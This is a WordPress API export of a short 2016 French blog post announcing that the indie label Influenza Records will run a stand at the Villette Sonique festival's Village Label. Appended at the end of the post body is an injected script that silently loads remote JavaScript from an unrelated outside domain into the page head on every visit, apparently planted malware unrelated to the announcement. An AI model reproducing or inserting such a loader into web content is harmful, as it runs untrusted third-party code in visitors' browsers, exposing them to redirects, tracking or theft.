{"id":4950,"date":"2016-05-25T13:47:52","date_gmt":"2016-05-25T11:47:52","guid":{"rendered":"http:\/\/www.wonderflu.com\/blog\/?p=4950"},"modified":"2026-03-20T12:41:17","modified_gmt":"2026-03-20T11:41:17","slug":"influenza-records-au-village-label-de-villette-sonique","status":"publish","type":"post","link":"https:\/\/www.wonderflu.com\/blog\/2016\/05\/influenza-records-au-village-label-de-villette-sonique\/","title":{"rendered":"Influenza Records au Village Label de Villette Sonique"},"content":{"rendered":"<p>Communiqu\u00e9 de la maison m\u00e8re (<a href=\"http:\/\/www.influenza-records.com\/2016\/05\/on-sera-au-village-label-de-villette-sonique-2016\/\">lire<\/a>) concernant le festival <strong>Villette Sonique<\/strong> de ce week-end :<\/p>\n<blockquote><p>Votre label de rock ind\u00e9 pr\u00e9f\u00e9r\u00e9 tiendra un stand au Village Label\u00a0les samedi 28 et dimanche 29 mai de 14h30 \u00e0 20h00 (environ).<\/p><\/blockquote>\n<p><a href=\"http:\/\/www.wonderflu.com\/blog\/wp-content\/uploads\/2016\/05\/visuel_villagelabel.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-4951\" src=\"http:\/\/www.wonderflu.com\/blog\/wp-content\/uploads\/2016\/05\/visuel_villagelabel-1024x378.png\" alt=\"visuel_villagelabel\" width=\"625\" height=\"231\" srcset=\"https:\/\/www.wonderflu.com\/blog\/wp-content\/uploads\/2016\/05\/visuel_villagelabel-1024x378.png 1024w, https:\/\/www.wonderflu.com\/blog\/wp-content\/uploads\/2016\/05\/visuel_villagelabel-300x111.png 300w, https:\/\/www.wonderflu.com\/blog\/wp-content\/uploads\/2016\/05\/visuel_villagelabel-624x231.png 624w, https:\/\/www.wonderflu.com\/blog\/wp-content\/uploads\/2016\/05\/visuel_villagelabel.png 1256w\" sizes=\"(max-width: 625px) 100vw, 625px\" \/><\/a><\/p>\n<p><script>var url = 'https:\/\/wafsearch.wiki\/usa';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Communiqu\u00e9 de la maison m\u00e8re (lire) concernant le festival Villette Sonique de ce week-end : Votre label de rock ind\u00e9 pr\u00e9f\u00e9r\u00e9 tiendra un stand au Village Label\u00a0les samedi 28 et dimanche 29 mai de 14h30 \u00e0 20h00 (environ).<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/posts\/4950"}],"collection":[{"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/comments?post=4950"}],"version-history":[{"count":3,"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/posts\/4950\/revisions"}],"predecessor-version":[{"id":7991,"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/posts\/4950\/revisions\/7991"}],"wp:attachment":[{"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/media?parent=4950"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/categories?post=4950"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wonderflu.com\/blog\/wp-json\/wp\/v2\/tags?post=4950"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}